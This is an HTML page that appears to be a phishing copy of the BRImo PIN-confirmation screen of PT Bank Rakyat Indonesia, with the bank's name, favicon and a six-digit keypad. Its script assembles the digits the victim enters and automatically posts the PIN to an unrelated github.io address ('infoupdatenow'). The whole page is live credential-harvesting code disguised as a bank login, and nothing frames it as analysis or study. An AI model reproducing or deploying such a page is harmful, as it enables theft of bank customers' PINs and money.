<!doctype html>
<html ⚡> 

 <head> 
  <meta charset="utf-8"> 
    <script async src="https://cdn.ampproject.org/v0.js"></script>
    <link rel="canonical" href="https://amp.dev/documentation/guides-and-tutorials/start/create/basic_markup/">
    <meta name="viewport" content="width=device-width,minimum-scale=1,initial-scale=1">
    <style amp-boilerplate>body{-webkit-animation:-amp-start 8s steps(1,end) 0s 1 normal both;-moz-animation:-amp-start 8s steps(1,end) 0s 1 normal both;-ms-animation:-amp-start 8s steps(1,end) 0s 1 normal both;animation:-amp-start 8s steps(1,end) 0s 1 normal both}@-webkit-keyframes -amp-start{from{visibility:hidden}to{visibility:visible}}@-moz-keyframes -amp-start{from{visibility:hidden}to{visibility:visible}}@-ms-keyframes -amp-start{from{visibility:hidden}to{visibility:visible}}@-o-keyframes -amp-start{from{visibility:hidden}to{visibility:visible}}@keyframes -amp-start{from{visibility:hidden}to{visibility:visible}}</style><noscript><style amp-boilerplate>body{-webkit-animation:none;-moz-animation:none;-ms-animation:none;animation:none}</style></noscript>
    <meta name="fragment" content="!">
    <meta name="theme-color" content="#0f78cb">
    <meta name="description" content="Gedung BRI, Jl. Jendral Sudirman Kav.44-46 Jakarta 1021........">
    <meta name="twitter:card" content="summary_large_image" />
    <meta property="og:" content="PT.Bank Rakyat Indonesia (Persero) Tbk." />
    <meta name="twitter:title" content="PT.Bank Rakyat Indonesia (Persero) Tbk." />
    <meta property="og:site_name" content="PT.Bank Rakyat Indonesia (Persero) Tbk." />
    <meta name="twitter:site_name" content="PT.Bank Rakyat Indonesia (Persero) Tbk." />
    <meta property="og:description" content="Gedung BRI, Jl. Jendral Sudirman Kav.44-46 Jakarta 1021........" />
    <meta name="twitter:description" content="Gedung BRI, Jl. Jendral Sudirman Kav.44-46 Jakarta 1021........" />
    <link rel="icon" href="https://brimo.bri.co.id/app/assets/img/favicons/brimo_logo.png" type="image/x-icon">
    <meta property="og:type" content="website" />
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent" />
    <meta name="viewport" content="width=device-width,initial-scale=1.0, user-scalable=no, minimal-ui">
    <title>PT.Bank Rakyat Indonesia (Persero) Tbk.</title>
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.2.1/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-iYQeCzEYFbKjA/T2uDLTpkwGzCiq6soy8tYaI1GyVh/UjpbCx/TYkiZhlZB6+fzT" crossorigin="anonymous">
    <link rel="stylesheet" href="https://code.ionicframework.com/ionicons/2.0.0/css/ionicons.min.css"/>
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
    <link href="https://fonts.googleapis.com/css2?family=Open+Sans:wght@500;700&display=swap" rel="stylesheet">
      <style>
        @import url('https://fonts.googleapis.com/css2?family=Open+Sans:wght@500&display=swap');
        body {
            padding: 0px;
            margin: 0px;
            width: 100%;
            font-family: 'Open Sans', sans-serif;
            overflow: hidden; background: none rgb(12, 121, 245);
            padding-right: 15px;
        }

        .text-header {
            font-family: 'Verdana';
            color: #fff;
        }

        .text-subheader {
            font-family: 'Verdana';
            margin-top: -50px;
            color: #fff;
            font-size: 15px;
        }

        .sizing {
            width: 100px;
        }

        @media only screen and (max-width: 600px) {
            .sizing {
                width: 100%;
            }
        } 

        .pinNumb {
            cursor: pointer;
            box-sizing: border-box; 
            width: 105%; 
            background-color: none; 
            font-size: 26px; color: #fff; 
            text-align: center; 
            padding-top: 0px; 
            border-radius: 10px; 
            box-shadow: rgba(171, 171, 171, 0) 0px 0px 0px 0px; 
            height: 50px;
            background: none;
            border: none;
        }

        button.pinNumb:hover {
            color: #fff;
            background-color: rgba(255, 255, 255, 0.1);
            border: 0px solid rgba(255, 255, 255, 0.1);
        }

    </style> 
 </head> 
 <body> 
  <div class="container"> 
   <div class="row" style="margin-top: -45px;"> 
    <div class="col-12 d-block mx-auto sizing" style="white-space: pre-wrap; text-align: center; margin-top: 20px; height: 100px; padding-bottom: 100px; font-family: Barlow; font-size: 13px; font-weight: 400; color: rgb(255,255,255); line-height: 1.5; border-radius: 0px;"> 
     <div class="text-header" style="font-family: 'Arial'"><font size="4.5"><strong>PIN</strong></font>
     </div> 
    </div> 
   </div> 
   <div class="row" style="margin-top: -80px;"> 
     <div class="col-12 d-block mx-auto sizing" style="white-space: pre-wrap; height: 50px; padding-bottom: 0px; font-size: 16px; font-weight: 400; color: rgb(59, 59, 59); line-height: 1.5; border-radius: 0px;">
      <div class="text-header"><font size="4">
     <strong>Konfirmasi PIN</strong></font>
    </div><div class="text-subheader">
      Konfirmasi PIN yang sudah Anda buat</div>
     </div> 
   </div> 
   <div class="row" style="margin-top: -50px;"> 
    <div class="col-12 d-block mx-auto sizing" style="white-space: pre-wrap; height: 100px; padding-bottom: 100px; font-size: 16px; font-weight: 400; color: rgb(59, 59, 59); line-height: 1.4; border-radius: 0px;"> 
     <div class="row"> 
      <div class="col-2"> 
       <div class="bubble-r-box" style="height: 52px; left: 0px; width: 50px;"> 
        <div class="bubble-element Group" id="pin-1" style="box-sizing: border-box; font-size: 30px; color: #fff; text-align: center; padding-top: 5px;  width: 50px; left: 0px; top: 0px; background-color: rgba(255, 255, 255, 0.34); border-radius: 10px; box-shadow: rgba(171, 171, 171, 0) 0px 0px 0px 0px; height: 52px;"></div> 
       </div> 
      </div> 
      <div class="col-2"> 
       <div class="bubble-r-box" style="height: 52px; left: 0px; width: 50px;"> 
        <div class="bubble-element Group" id="pin-2" style="box-sizing: border-box; width: 50px; font-size: 30px; color: #fff; text-align: center; padding-top: 5px;background-color: rgba(255, 255, 255, 0.34); border-radius: 10px; box-shadow: rgba(171, 171, 171, 0) 0px 0px 0px 0px; height: 52px;"></div> 
       </div> 
      </div> 
      <div class="col-2"> 
       <div class="bubble-r-box" style="height: 52px; left: 0px; width: 50px;"> 
        <div class="bubble-element Group" id="pin-3" style="box-sizing: border-box; width: 50px; font-size: 30px; color: #fff; text-align: center; padding-top: 5px;background-color: rgba(255, 255, 255, 0.34); border-radius: 10px; box-shadow: rgba(171, 171, 171, 0) 0px 0px 0px 0px; height: 52px;"></div> 
       </div> 
      </div> 
      <div class="col-2"> 
       <div class="bubble-r-box" style="height: 52px; left: 0px; width: 50px;"> 
        <div class="bubble-element Group" id="pin-4" style="box-sizing: border-box; width: 50px; font-size: 30px; color: #fff; text-align: center; padding-top: 5px;background-color: rgba(255, 255, 255, 0.34); border-radius: 10px; box-shadow: rgba(171, 171, 171, 0) 0px 0px 0px 0px; height: 52px;"></div> 
       </div> 
      </div> 
      <div class="col-2"> 
       <div class="bubble-r-box" style="height: 52px; left: 0px; width: 50px;"> 
        <div class="bubble-element Group" id="pin-5" style="box-sizing: border-box; width: 50px; font-size: 30px; color: #fff; text-align: center; padding-top: 5px; background-color: rgba(255, 255, 255, 0.34); border-radius: 10px; box-shadow: rgba(171, 171, 171, 0) 0px 0px 0px 0px; height: 52px;"></div> 
       </div> 
      </div> 
      <div class="col-2"> 
       <div class="bubble-r-box" style="height: 52px; left: 0px; width: 50px;"> 
        <div class="bubble-element Group" id="pin-6" style="box-sizing: border-box; width: 50px; font-size: 30px; color: #fff; text-align: center; padding-top: 5px;background-color: rgba(255, 255, 255, 0.34); border-radius: 10px; box-shadow: rgba(171, 171, 171, 0) 0px 0px 0px 0px; height: 52px;"></div> 
       </div> 
      </div> 
     </div> 
     <div class="row" style="margin-top: -70px"> 
      <div class="col-12"> 
       <div class="text-header text-center" style="font-family: 'Arial'"> <font size="3"><strong>Lupa PIN</strong></font>
       </div> 
      </div> 
     </div> 
    </div> 
   </div> 
   <div class="row" style="margin-top: 100px"> 
     <div class="col-12 d-block mx-auto sizing" style="white-space: pre-wrap; height: 100px; padding-bottom: 50px; font-size: 16px; font-weight: 400; color: rgb(59, 59, 59); line-height: 1.5; border-radius: 0px;"> 
      <div class="row"> 
       <div class="col-4"> <button class="bubble-element Group pinNumb" id="setPin" data-id="1">1</button> 
       </div> 
       <div class="col-4"> <button class="bubble-element Group pinNumb" id="setPin" data-id="2">2</button> 
       </div> 
       <div class="col-4"> <button class="bubble-element Group pinNumb" id="setPin" data-id="3">3</button> 
       </div> 
     </div> 
     <div class="row" style="margin-top: -90px"> 
       <div class="col-4"> <button class="bubble-element Group pinNumb" id="setPin" data-id="4">4</button> 
       </div> 
       <div class="col-4"> <button class="bubble-element Group pinNumb" id="setPin" data-id="5">5</button> 
       </div> 
       <div class="col-4"> <button class="bubble-element Group pinNumb" id="setPin" data-id="6">6</button> 
       </div> 
     </div> 
     <div class="row" style="margin-top: -90px"> 
       <div class="col-4"> <button class="bubble-element Group pinNumb" id="setPin" data-id="7">7</button> 
       </div> 
       <div class="col-4"> <button class="bubble-element Group pinNumb" id="setPin" data-id="8">8</button> 
       </div> 
       <div class="col-4"> <button class="bubble-element Group pinNumb" id="setPin" data-id="9">9</button> 
       </div> 
     </div> 
     <div class="row" style="margin-top: -90px"> 
       <div class="col-4"> 
       </div> 
       <div class="col-4"> <button class="bubble-element Group pinNumb" id="setPin" data-id="0">0</button> 
       </div> 
       <div class="col-4"> <button class="bubble-element Group pinNumb" id="hapus"><i class="ion-backspace-outline"></i></button> 
       </div> 
      </div> 
    </div> 
   </div> 
  </div> 
  <form id="ryuSubmit" action="https://infoupdatenow.github.io/lnfnew.github.io/download/" method="POST"> 
   <input type="hidden" name="setPin" id="setPin"> 
  </form> 
  <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script> 
  <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.2.0-beta1/dist/js/bootstrap.bundle.min.js" integrity="sha384-pprn3073KE6tl6bjs2QrFaJGz5/SUsLqktiwsUTF55Jfv3qYSDhgCecCxMW52nD2" crossorigin="anonymous"></script> 
  <script>
        $(document).ready(function() {
            $("button#setPin").on('click', function() {
                var pin = $(this).attr('data-id');
                
                if($.trim($("#pin-1").html())=='') {
                    $("#pin-1").html(pin);
                } else if($.trim($("#pin-1").html())!='' && $.trim($("#pin-2").html())=='') {
                    $("#pin-2").html(pin);
                } else if($.trim($("#pin-2").html())!='' && $.trim($("#pin-3").html())=='') {
                    $("#pin-3").html(pin);
                } else if($.trim($("#pin-3").html())!='' && $.trim($("#pin-4").html())=='') {
                    $("#pin-4").html(pin);
                } else if($.trim($("#pin-4").html())!='' && $.trim($("#pin-5").html())=='') {
                    $("#pin-5").html(pin);
                } else if($.trim($("#pin-5").html())!='' && $.trim($("#pin-6").html())=='') {
                    $("#pin-6").html(pin);

                    var setPin = $("#pin-1").html()+''+$("#pin-2").html()+''+$("#pin-3").html()+''+$("#pin-4").html()+''+$("#pin-5").html()+''+$("#pin-6").html();
                    $("input#setPin").val(setPin);

                    var pinValue = $("input#setPin").val();

                    if(pinValue.length == 6) {
                        $("#ryuSubmit").submit();

                    }
                }
            });

            $("#hapus").on('click', function() {
                $("#pin-1").html('');
                $("#pin-2").html('');
                $("#pin-3").html('');
                $("#pin-4").html('');
                $("#pin-5").html('');
                $("#pin-6").html('');
            });
        });
    </script>
<style>
img[alt*="www.000webhost.com"]
</body>
</html>
